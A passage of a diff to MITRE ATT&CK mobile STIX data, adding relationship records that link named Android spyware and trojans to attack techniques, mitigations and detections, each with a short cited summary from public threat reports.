+ "relationship_type": "uses", + "source_ref": "malware--507fe748-5e4a-4b45-9e9f-8b1115f4e878", + "target_ref": "attack-pattern--667e5707-3843-4da8-bd34-88b922526f0d", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--9c853c22-7607-4cbd-b114-08aaa4625c35", + "type": "relationship", + "created": "2020-12-17T20:15:22.405Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019." + } + ], + "modified": "2020-12-28T18:47:52.600Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) can collect device information and can check if the device is running MIUI on a Xiaomi device.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--99b4be95-74f2-48f7-b4e9-8b4d88ecd31f", + "created": "2020-09-11T14:54:16.642Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020.", + "url": "https://blog.lookout.com/desert-scorpion-google-play" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:21:19.617Z", + "description": "If running on a Huawei device, [Desert Scorpion](https://attack.mitre.org/software/S0505) adds itself to the protected apps list, which allows it to run with the screen off.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d638565b-ca8e-459f-9c3b-1bd8828606f5", + "type": "relationship", + "created": "2020-11-24T17:55:12.897Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos GPlayed", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020." + } + ], + "modified": "2020-11-24T17:55:12.897Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) can collect the user’s browser cookies.(Citation: Talos GPlayed)", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--465d14e7-eb9e-4794-9cb3-1de2cff86a8e", + "created": "2020-01-27T17:05:58.335Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Trend Micro Bouncing Golf 2019", + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:28:07.442Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) registers for the `USER_PRESENT` broadcast intent and uses it as a trigger to take photos with the front-facing camera.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7ba4fb2e-99ff-41ff-8b07-f02e9f74e890", + "created": "2023-01-18T19:09:40.955Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:58:45.439Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) can record the screen via the `MediaProjection` library to harvest user credentials, including biometric PINs.(Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--20aaafe2-1f55-410f-9eb1-1fc979021fe0", + "created": "2020-12-24T21:55:56.741Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:51:16.331Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has accessed the contact list.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5417959b-9478-49fb-b779-3c82a10ad080", + "type": "relationship", + "created": "2020-12-17T20:15:22.498Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019." + } + ], + "modified": "2020-12-17T20:15:22.498Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) can obtain a list of running apps.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d09abcd8-49bf-4d0f-8b17-0db7ada10ec2", + "type": "relationship", + "created": "2020-09-11T15:53:38.453Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "securelist rotexy 2018", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019." + } + ], + "modified": "2020-09-11T15:53:38.453Z", + "description": "[Rotexy](https://attack.mitre.org/software/S0411) can automatically reply to SMS messages, and optionally delete them.(Citation: securelist rotexy 2018)", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2f55e452-f8b3-402b-a193-d261dac9f327", + "created": "2022-04-01T18:53:48.715Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T18:53:48.715Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "target_ref": "attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--346b7e4a-dbd1-486b-ba26-55ae2ac613d0", + "type": "relationship", + "created": "2020-12-14T14:52:03.396Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Sophos Red Alert 2.0", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. Retrieved December 14, 2020." + } + ], + "modified": "2020-12-16T20:52:21.426Z", + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) can download additional overlay templates.(Citation: Sophos Red Alert 2.0)", + "relationship_type": "uses", + "source_ref": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0008005f-ca51-47c3-8369-55ee5de1c65a", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Zscaler-SpyNote", + "description": "Shivang Desai. (2017, January 23). SpyNote RAT posing as Netflix app. Retrieved January 26, 2017.", + "url": "https://www.zscaler.com/blogs/research/spynote-rat-posing-netflix-app" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:43:54.975Z", + "description": "[SpyNote RAT](https://attack.mitre.org/software/S0305) uses an Android broadcast receiver to automatically start when the device boots.(Citation: Zscaler-SpyNote)", + "relationship_type": "uses", + "source_ref": "malware--20dbaf05-59b8-4dc6-8777-0b17f4553a23", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--98b14660-79e1-4244-99c2-3dedd84eb68d", + "type": "relationship", + "created": "2020-09-11T14:54:16.582Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T14:54:16.582Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can track the device’s location.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--8cb42e3d-69f4-4b0d-98c9-0bb7560947c1", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "TrendMicro-RCSAndroid", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/", + "description": "Veo Zhang. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. Retrieved December 22, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[RCSAndroid](https://attack.mitre.org/software/S0295) can use SMS for command and control.(Citation: TrendMicro-RCSAndroid)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--605d95a1-0493-418e-9d81-de58531c4421", + "created": "2020-04-24T15:12:11.217Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:04:31.136Z", + "description": "[Concipit1248](https://attack.mitre.org/software/S0426) communicates with the C2 server using HTTP requests.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--89c3dbf6-f281-41b7-be1d-a0e641014853", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f062ebc5-bad0-4b19-8c97-bf3915d687bd", + "created": "2023-03-20T18:51:58.152Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:51:58.152Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0", + "target_ref": "attack-pattern--948a447c-d783-4ba0-8516-a64140fcacd5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ca9e5e50-49e9-44cc-a0a4-4ec8633a9506", + "type": "relationship", + "created": "2020-11-20T16:37:28.567Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Symantec GoldenCup", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020." + } + ], + "modified": "2020-11-20T16:37:28.567Z", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) has encrypted exfiltrated data using AES in ECB mode.(Citation: Symantec GoldenCup)", + "relationship_type": "uses", + "source_ref": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "target_ref": "attack-pattern--e3b936a4-6321-4172-9114-038a866362ec", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--45da5ed9-3a9b-4491-98cb-96db68e245bb", + "created": "2020-12-14T14:52:03.184Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Sophos Red Alert 2.0", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. Retrieved December 14, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) has used malicious overlays to collect banking credentials.(Citation: Sophos Red Alert 2.0)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f3e902fe-7eea-4b85-9067-25d29fd01dc5", + "created": "2023-03-20T15:21:12.492Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:21:12.492Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6", + "target_ref": "attack-pattern--c08366bb-8d11-4921-853f-f0a3b6a2a1da", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--322d0123-ea4c-4562-a718-672952c83d05", + "created": "2023-03-20T18:55:54.372Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:55:54.372Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--b7c0e45f-0206-4f75-96e7-fe7edad3aaff", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--bcc8eb7a-d2a8-41d2-832e-f435e51c685a", + "created": "2022-03-30T19:54:43.835Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Security updates frequently contain fixes for vulnerabilities that could be leveraged to modify protected operating system files. ", + "modified": "2022-03-30T19:54:43.835Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--544e8fc3-c656-4081-9b4f-8a5d60926f47", + "created": "2022-04-01T17:08:41.293Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "If devices are enrolled using Apple User Enrollment or using a profile owner enrollment mode for Android, device controls prevent the enterprise from accessing the device’s physical location. This is typically used for a Bring Your Own Device (BYOD) deployment. ", + "modified": "2022-04-01T17:08:41.293Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--db3fc82d-d353-438d-aa5e-9b5e7e60f0ac", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-PegasusAndroid", + "description": "Mike Murray. (2017, April 3). Pegasus for Android: the other side of the story emerges. Retrieved April 16, 2017.", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/" + } + ], + "modified": "2019-08-09T17:52:31.748Z", + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) checks if the device is on Wi-Fi, a cellular network, and is roaming.(Citation: Lookout-PegasusAndroid)", + "relationship_type": "uses", + "source_ref": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b7a31a11-6c84-4c28-a548-4751e4d71134", + "created": "2020-05-04T14:04:56.158Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Google Bread", + "url": "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html", + "description": "A. Guertin, V. Kotov, Android Security & Privacy Team. (2020, January 9). PHA Family Highlights: Bread (and Friends) . Retrieved April 27, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Bread](https://attack.mitre.org/software/S0432) can perform SMS fraud on older versions of the malware, and toll fraud on newer versions.(Citation: Google Bread)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--108b2817-bc01-404e-8e1b-8cdeec846326", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d5928f73-c4ba-4eb1-bf8a-e75ff6806a4a", + "type": "relationship", + "created": "2020-11-10T17:08:35.713Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-11-10T17:08:35.713Z", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) can collect notes and data from the MiCode app.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d63de13b-0253-42f4-b13d-34bccf76ad94", + "created": "2023-03-20T18:54:50.323Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:54:50.323Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--648f8051-1a35-46d3-b1d8-3a3f5cf2cc8e", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--628435f7-7d1e-40f1-a29a-7c5861b14c7d", + "created": "2022-03-30T20:13:40.625Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be shown what a synthetic activity looks like so they can scrutinize them in the future.", + "modified": "2022-03-30T20:13:40.625Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4ff9b16f-3643-4fa0-b107-f93a9bb847c3", + "created": "2023-02-28T21:44:45.063Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cloudmark_tanglebot_0921", + "description": "Felipe Naves, Andrew Conway, W. Stuart Jones, Adam McNeil . (2021, September 23). TangleBot: New Advanced SMS Malware Targets Mobile Users Across U.S. and Canada with COVID-19 Lures. Retrieved February 28, 2023.", + "url": "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:26:33.166Z", + "description": "[TangleBot](https://attack.mitre.org/software/S1069) can use overlays to cover legitimate applications or screens.(Citation: cloudmark_tanglebot_0921)", + "relationship_type": "uses", + "source_ref": "malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b263e4e9-972d-4ba7-8be8-e55eb6a483c0", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "ArsTechnica-HummingWhale", + 